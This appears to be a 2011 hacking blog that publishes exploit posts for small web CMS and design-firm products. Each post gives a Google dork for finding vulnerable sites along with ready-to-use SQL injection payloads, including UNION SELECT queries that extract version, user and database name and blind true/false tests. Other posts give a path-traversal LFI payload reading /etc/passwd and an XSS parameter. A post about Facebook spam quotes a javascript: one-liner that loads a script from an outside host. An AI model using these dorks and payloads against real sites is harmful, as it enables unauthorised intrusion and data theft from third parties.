Wednesday, June 15, 2011

Axel Accelarator for Windows

I google a bit and found someone that share this Axel accelarator for windows users.

Download here.
http://www.mediafire.com/?wi8dw1hbaqinhfz

extract and just use it!

usage like below
Usage: axel.exe [options] url1 [url2] [url...]

--max-speed=x -s x Specify maximum speed (bytes per second)
--num-connections=x -n x Specify maximum number of connections
--output=f -o f Specify local output file
--search[=x] -S [x] Search for mirrors and download from x servers
--header=x -H x Add header string
--user-agent=x -U x Set user agent
--no-proxy -N Just don't use any proxy server
--quiet -q Leave stdout alone
--verbose -v More status information
--alternate -a Alternate progress indicator
--help -h This information
--version -V Version information
screenshot




credit to

// ghuntley [code]https://github.com/ghuntley/cygwin-axel/[/code]
// ~n2j3 [code]http://st0rage.org/~n2j3/[/code] :drunk:

Monday, June 6, 2011

Web Wiz Site News Vulnerable to SQL Injection

#####################################################################
## Title : Web Wiz Site News Vulnerable to SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: http://www.webwiz.co.uk/ ##
## Dork : Powered by Web Wiz Site News ##
#####################################################################

- POC -
http://site.com/news/news_item.asp?NewsID=[SQL]

- Thanks -
p0pc0rn

edit: found by others already. http://www.1337day.com/exploits/15677

Friday, June 3, 2011

El Espejo Web Design Vulnerable to Multiple SQL Injection

#####################################################################
## Title : El Espejo Web Design Vulnerable to Multiple SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: http://www.elespejodesign.com.ar/sitio/index.php ##
## Dork : !@#$%^&*()_ ##
#####################################################################

- POC -
http://site.com/sitio/something.php?id=[SQL]
http://site.com/sitio/detalle_foto.php?id=-236 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(version(),0x3a,user(),0x3a,database()),16,17,18,19--

http://site.com/sitio/detalle_edificios.php?id=-144 UNION SELECT 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--

not just parameter index.php,there are more parameters vulnerable. Check it out.

- Thanks -
p0pc0rn

Inmueblesoft CMS Vulnerable to Multiple SQL Injection


##################################################################
## Title : Inmueblesoft CMS Vulnerable to Multiple SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: www.inmueblesoft.com ##
## Dork : intext:"Inmueblesoft" filetype:php ##
#################################################################

- POC -
http://site.com/index.php?tabla=something&id=[SQL]
http://site.com/index.php?tabla=something&id=-15 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95--



not just parameter index.php,there are more parameters vulnerable. Check it out.

- Thanks -
p0pc0rn

Monday, May 23, 2011

Acuity CMS Vulnerable to Blind SQL Injection


Title : Acuity CMS Vulnerable to Blind SQL Injection
Found by : p0pc0rn
Dork : intext:"Powered by Acuity CMS."
Web : http://www.acuitycms.com/

SQL Injection
----------------
http://www.site.com/browse.asp?page=[Blind SQL]

POC
----
http://www.site.com/browse.asp?page=255+or+1=1 TRUE
http://www.site.com/browse.asp?page=255+or+1=1 FALSE

thanks,
-p0pc0rn-

Golden IT Solutions Web Design Vulnerable to SQL Injection

Title : Golden IT Solutions Web Design Vulnerable to SQL Injection
Found by : p0pc0rn
Dork : intext:"Developed By : Golden IT Solutions"

SQL Injection
----------------
http://www.site.com/anypath.php?ID=[SQL]

POC
----
http://www.site.com/memProfile.php?ID=-2800 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--



thanks,
-p0pc0rn-

Saturday, May 21, 2011

New LFI Exploit found :)

New LFI Exploit found :)
-------------------------
By p0pc0rn May 2011
Dork: inurl:"index.php?loc=subindex"
Exploit :
site.com/index.php?loc=../../../../../../../../../../../../../../../etc/passwd





thanks
-p0pc0rn-

Wednesday, May 11, 2011

New WallSpam Using Javascript in Facebook

New WallSpam Using Javascript in Facebook
------------------------------------------

If u notice a wallpost like this,NEVER EVER CLICK IT!!
[spam]Not like Justin Biebier which always never say never.He's an idiot [/spam]

Take note the url below your browser.when you click the link,you will execute a javascript to post it on your wall.
javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();
http://pelorak.info/verify.js
<--bad evil code!!



I tried to click and this what appeared.


And the it'll redirect you to here

So,just like others,your profile will full with spams.
Beware more will come after this.Someone will take this as an oppurtunity to have fun.

Tuesday, May 3, 2011

Creatop Web Design Vulnerable to PosgreSQL Injection


Title : Creatop Web Design Vulnerable to PosgreSQL Injection
Vendor: http://www.creatop.com.au/
Found : by p0pc0rn
Dork : intext:"by Creatop" filetype:cfm

PosgreSQL Injection
-------------------
http://www.victim.com/index.cfm?MenuID=[Injection]

Example:
http://www.victim.com/index.cfm?MenuID=80 and 1=cast(version() as int)
### ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit" ###



.:p0pc0rn:.

Saturday, April 30, 2011

PakCyber Web Design Multiple Vulnerabilities


Title : PakCyber Web Design Multiple Vulnerabilities
Found : by p0pc0rn
Vendor: http://pakcyber.com/
Dork : intext:"Powered By PakCyber"

Blind SQL Injection
-------------------

http://www.victim.com/site.php?article_id=[Blindey]
Eg:
http://www.victim.com/full_article_text.php?article_id=808 and 1=1 TRUE
http://www.victim.com/full_article_text.php?article_id=808 and 1=2 FALSE

http://www.victim2.com/site.php?cid=[Blindey]
Eg:
http://www.victim2.com/university.php?cid=8 or 1=1-- TRUE
http://www.victim2.com/university.php?cid=8 or 1=2-- FALSE



http://www.victim3.com/site.php?CatId=[Blindey]
Eg:
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=1-- TRUE
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=2-- FALSE

There are more parameters need to be checked out.High possibility there's a SQL Injection vulnerablity too

Cross Site Scripting
--------------------
http://www.victim.com/CategoryDetails.php?CatId=44&CatName=[XSS]

thanks,
#p0pc0rn#